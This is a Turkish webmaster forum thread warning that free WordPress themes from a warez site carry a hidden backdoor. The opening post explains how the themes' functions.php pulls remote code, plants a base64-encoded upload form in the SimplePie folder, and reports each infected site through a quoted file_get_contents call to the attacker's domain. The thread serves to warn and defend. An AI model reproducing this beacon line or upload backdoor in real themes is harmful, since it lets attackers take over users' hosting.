lostyazilim
tr.link

Ucretsiztemalar.net tuzağı çok dikkat

44 Mesajlar 8.067 Okunma
acebozum
tr.link

Webbiu Webbiu Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 09.09.2013
  • Yaş/Cinsiyet 32 / E
  • Meslek Freelance
  • Konum İstanbul Avrupa
  • Ad Soyad M** Y**
  • Mesajlar 643
  • Beğeniler 194 / 98
  • Ticaret 10, (%100)
MESAJ *** ALINTIDIR ;

Merhaba arkadaşlar, *** bünyesinde ki birçok tema yapımcısının emeklerini hiç sayarak insanlara ücretsiz sunan ve wordpress tema aramalarında ilk sıralarda gelen bu sitenin ne denli büyük bir tuzak olduğunu hep beraber göreceğiz. Lütfen sabırlıca dikkatinizi vererek okuyunuz.

Neden w4rez kullanmamalıyız sorusunun cevabının; temaya emek veren insanların bütün hakkının gasedilmesinin yanı sıra temayı kullanan insanlar içinde nasıl bir tehdit olduğunu şimdi hep birlikte görelim. Bu sitede görmüş olduğunuz her tema sahiplerinin izni olmaksızın dosyalarının çekilip yayınlanmasından ibaret, öyle ki çok ciddi sayıda temayı bu sitede görebiliyoruz. Özellikle webmaster forumunda her insanın bu siteye girmiş olma ihtimali çok yüksek. Sadece w4rez anlamında değil daha warezin ne olduğunu bilmeyen insanların dahi bu siteye girip temaları indirmiş olma ihtimali çok yüksek. Şimdi burda yayınlanmış olan bütün temaların içine gizlenmiş olan kodlar ile bütün bilgilerinize, hostunuza nasıl erişim sağladıklarını bir inceleyelim.

Herhangi bir temayı indirip functions.php dosyasını inceledik.




Resimde kırmızı çerçeve içine aldığım kod ile uzaktaki bir txt dosyasının içindeki kodların sitenize uygulanması mümkün kılınmış. Şöyle ki bu linkteki adrese girdiğimiz zaman şöyle bir sonuç ile karşılaşıyoruz:



Php bilen arkadaşlar daha iyi bileceklerdir ki bu dosyanın içindeki kodlar ile "/wp-includes/SimplePie/" dizininin içine theme-options.php isimli bir dosya oluşturulmakta ve bu dosyanın içinide "val(base64_decode" şeklinde başlayan kodlar yerleştirilmektedir. Bu kodu decode edip incelediğimiz zaman bir tür upload formu ile karşılaşıyoruz, oda şu şekildedir:




Gördüğünüz upload formunu oluşturup bu form sayesinde sitenize istedikleri zararlı dosyayı yüklemeleri, sadece bu bahsi geçen siteden tema indirip onu aktif etmenize bakıyor. Bu kadar basite indirgenmiş bir sistem oluşturulmuş. Peki bunlar benim siteme onlardan indirdiğim temayı kurduğumu nasıl bielceklerde bana zarar verebilecekler diye düşünebilirsiniz. Oda şu şekilde mümkün kılınmış:

@file_get_contents("http://yakaladimsizi.com/panel/l.php?a=http://".$_SERVER['SERVER_NAME']);
Satırı sayesinde sitenizde oluşturulmuş olan formun linki bu insanların panelinde görünebiliyor, ve bugun kim temamızı indirip tuzağa düşmüş diye kontrol edebiliyorlar.

Bu temalardan 2 3 tanesini inceleme fırsatı bulabildim, kimilerinde bu şekilde functions.php dosyasına kolay bir yol ile eklenmiş, bazılarına ise daha karmaşık ve kuşku uyandırmayacak yollar ile aynı sistem entegre edilmiştir. Tek ortak nokta hepsinde "/wp-includes/SimplePie/theme-options.php" dizinine aynı isimle form oluşturulması şeklinde görürünüyor.

Şimdi bilenler olabilir, veya şuan öğreneceği üzere bu bir tür null vbulletin vakası gibi de düşünülebilir. Vbulletin indir kelimesinde yarışan ilk 3 4 siteninde buna benzer yollar ile sisteminize sehll atılması mümkün kılınmış ve bu yüzden bir çok siteye zarar verilmiştir. Aynı mantığın wordpress içinde geçerli olduğunu görüyoruz. Bu kendini zeki sanan arkadaşlar "wordpress tema indir", "wp tema indir", "ücretsiz tema indir" tarzı kelimelerde en üste çıkmak için seo çalışmaları yapıyor ve onlara güvenip w4rez olsun veya olmasın herhangi bir temayı indirdiğiniz zaman bu tür tuzaklara düşebiliyorsunuz.

O yüzden burda zaten w4rez tema kullanmış beterine uğrasın" demek doğru bir tepki olsada aslında w4rez temaya dair bilgisi olmayan sadece tema indirmek için indiren insanlarda olabilir, bu insanların hostunu siz sağlıyor olabilirsiniz. Veya bu insanların arkadaşı olabilirsiniz. Bilmeden kötü sonuçlar doğurabileceklerini göremeyebilirler. Burda sadece onlar değil sizlerde zarar görebilirsiniz. İşte bu yüzden bu tür tuzaklara düşmemeniz konusunda ayrıntılı olara bu konuyu açtım.

Her konuda olduğu gibi artık wordpress temaları konusunda da titiz davranmalı, hem başkalarının emeklerine konmaktan geri durmalı hemde 3 kuruş vermemk adına kendinizi yakmayı göze almamalısınız.

Bu sitenin sahibinin kim olduğuna dair bir araştırma yapıp, ***da kullandığı nickine ulaştığımı zannediyorum. Aramızda dolaşan aktif bir üye oalrak gördüm. Lakin kanıtlama konusunda yeterli delillere sahip olmadığım için bu konuda katiyen bişey söylemeyeceğim. Umarım bu konuya denk gelirse insan emeğine tecavüzün ve hak yemenin ne denli ağır bişey olduğunu aynısını yaşayarak geçde olsa anlayabilir.
Batuhan Shakedown dihack

kişi bu mesajı beğendi.

wmaraci
reklam

Almina Almina WM Aracı Kullanıcı
  • Üyelik 26.10.2012
  • Yaş/Cinsiyet 41 / K
  • Meslek Genel olarak makaleci
  • Konum Mersin
  • Ad Soyad M** D**
  • Mesajlar 1072
  • Beğeniler 111 / 212
  • Ticaret 2, (%100)
Öncelikle bilgi veren paylaşımınız için teşekkürler. ***'da konuları buradaki kadar rahat takip edebilme şansımız yok, muhtemelen görmeyecektim, kendi adıma...
Sonrasında da insan ister istemez şunu düşünüyor: ücretsiz tema yapıp WP kullanıcıları için forum sitelerinde paylaşan çok sayıda arkadaşımız var, istisnalar kaideyi bozmaz, kimse yanlış anlamasın ama,
bu bilgi ile, hem WP kullanıcıları uyarılmış; hem de tema yapanlara yol gösterilmemiş mi sizce de? Bilgisi az olan biri, pratiklik arayan biri, bu temalardan, görünümünü beğendiğini hemen sitesine indirip kuruyor, incelemiyoruz ben şahsen öyle yapıyor...dum.
Artık bu işin daha kolayını buldum, WordPress'in kendi panelinde oldukça kaliteli temalar var, bunlardan kullanmaya çalışıyorum. Ama şimdi yine de ne kadar güvende olduğumu düşünmeye başladım.
 

 

Webbiu Webbiu Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 09.09.2013
  • Yaş/Cinsiyet 32 / E
  • Meslek Freelance
  • Konum İstanbul Avrupa
  • Ad Soyad M** Y**
  • Mesajlar 643
  • Beğeniler 194 / 98
  • Ticaret 10, (%100)

Almina adlı üyeden alıntı

Öncelikle bilgi veren paylaşımınız için teşekkürler. ***'da konuları buradaki kadar rahat takip edebilme şansımız yok, muhtemelen görmeyecektim, kendi adıma...
Sonrasında da insan ister istemez şunu düşünüyor: ücretsiz tema yapıp WP kullanıcıları için forum sitelerinde paylaşan çok sayıda arkadaşımız var, istisnalar kaideyi bozmaz, kimse yanlış anlamasın ama,
bu bilgi ile, hem WP kullanıcıları uyarılmış; hem de tema yapanlara yol gösterilmemiş mi sizce de? Bilgisi az olan biri, pratiklik arayan biri, bu temalardan, görünümünü beğendiğini hemen sitesine indirip kuruyor, incelemiyoruz ben şahsen öyle yapıyor...dum.
Artık bu işin daha kolayını buldum, WordPress'in kendi panelinde oldukça kaliteli temalar var, bunlardan kullanmaya çalışıyorum. Ama şimdi yine de ne kadar güvende olduğumu düşünmeye başladım.


Merhabalar,
Ben internetten indirdiğim bütün temaların dosyalarına bakarım şahsen açıklardan anlıyorum en azından kapatmasını biliyorum ve uzun süredir hiç bir problemim olmadı ama bunun işi kontrolden geçiyor eğer ucretsiztemalar.net tema indirdiyseniz bütün wp dosyalarını silip yeniden yükleyiniz.
 

 

murat709 murat709 WM Aracı Kullanıcı
  • Üyelik 25.02.2014
  • Yaş/Cinsiyet 40 / E
  • Meslek serbest
  • Konum Antalya
  • Ad Soyad N** D**
  • Mesajlar 446
  • Beğeniler 48 / 66
  • Ticaret 8, (%100)
Emeğinize sağlık hocam.
Webbiu

kişi bu mesajı beğendi.

wmaraci
wmaraci

blogkum blogkum iyi gidiyor Kullanıcı
  • Üyelik 31.05.2014
  • Yaş/Cinsiyet 31 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad Y** K**
  • Mesajlar 196
  • Beğeniler 7 / 53
  • Ticaret 3, (%33)
Çok yararlı konu, insanlar wa.re.z yerine bir çok kaliteli ücretsiz tema var neden onları kullanmazlar anlamıyorum, bu riski almaya değer mi ?
Webbiu cuneytsonmez

kişi bu mesajı beğendi.

Her şey yolunda.

Batuhan Batuhan Kendine webmaster Kullanıcı
  • Üyelik 08.05.2011
  • Yaş/Cinsiyet 28 / E
  • Meslek Öğrenci
  • Konum Ankara
  • Ad Soyad B** B**
  • Mesajlar 3455
  • Beğeniler 783 / 1009
  • Ticaret 1, (%100)
yakaladimsizi.com suspend edilmiş. Hiç kafaları da çalışmıyor, hem ************** hem kafasızlar, insan mirror sistemi kullanır.

Ek Olarak: Bilgilendirme için çok teşekkürler

Ek Olarak: http://wmaraci.com/whois?s=yakaladimsizi.com

Webbiu

kişi bu mesajı beğendi.

Webbiu Webbiu Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 09.09.2013
  • Yaş/Cinsiyet 32 / E
  • Meslek Freelance
  • Konum İstanbul Avrupa
  • Ad Soyad M** Y**
  • Mesajlar 643
  • Beğeniler 194 / 98
  • Ticaret 10, (%100)

Batuhan adlı üyeden alıntı

yakaladimsizi.com suspend edilmiş. Hiç kafaları da çalışmıyor, hem ************** hem kafasızlar, insan mirror sistemi kullanır.

Ek Olarak: Bilgilendirme için çok teşekkürler

Ek Olarak: http://wmaraci.com/whois?s=yakaladimsizi.com



Zaten mirror sanırım hiç bir bilgi bulamadım.
 

 

davutkara davutkara Öğrenci Kullanıcı
  • Üyelik 15.07.2013
  • Yaş/Cinsiyet 29 / E
  • Meslek Öğrenci
  • Konum Ankara
  • Ad Soyad D** K**
  • Mesajlar 329
  • Beğeniler 20 / 68
  • Ticaret 1, (%100)
bilgilendirme için teşekkürler, bu tür insanlardan her şey beklenir. Wordpress tema veya eklenti indirirken aslında sadece yapımcının sitesinden indirmemiz gerektiğini bir kez daha anlamış olduk.
Webbiu

kişi bu mesajı beğendi.

davutkara.com | DAVUT KARA BLOG | Wordpress Uzmanı

Immortal Immortal Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 13.04.2014
  • Yaş/Cinsiyet 44 / E
  • Meslek Medya Danışmanı
  • Konum İstanbul Avrupa
  • Ad Soyad F** Ç**
  • Mesajlar 260
  • Beğeniler 19 / 38
  • Ticaret 0, (%0)
Teşekkürler hocam vermiş olduğunuz bilgi için. Emeğinize sağlık
Webbiu

kişi bu mesajı beğendi.

HeroTurk HeroTurk Ne Mutlu Türküm Diyene!!! Kimlik Onayı
  • Üyelik 29.06.2013
  • Yaş/Cinsiyet 36 / E
  • Meslek Cnc programcısı
  • Konum Karabük
  • Ad Soyad Ö** Ç**
  • Mesajlar 3963
  • Beğeniler 315 / 705
  • Ticaret 47, (%100)
teşekkürler bilgilendirme için .
Webbiu

kişi bu mesajı beğendi.

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al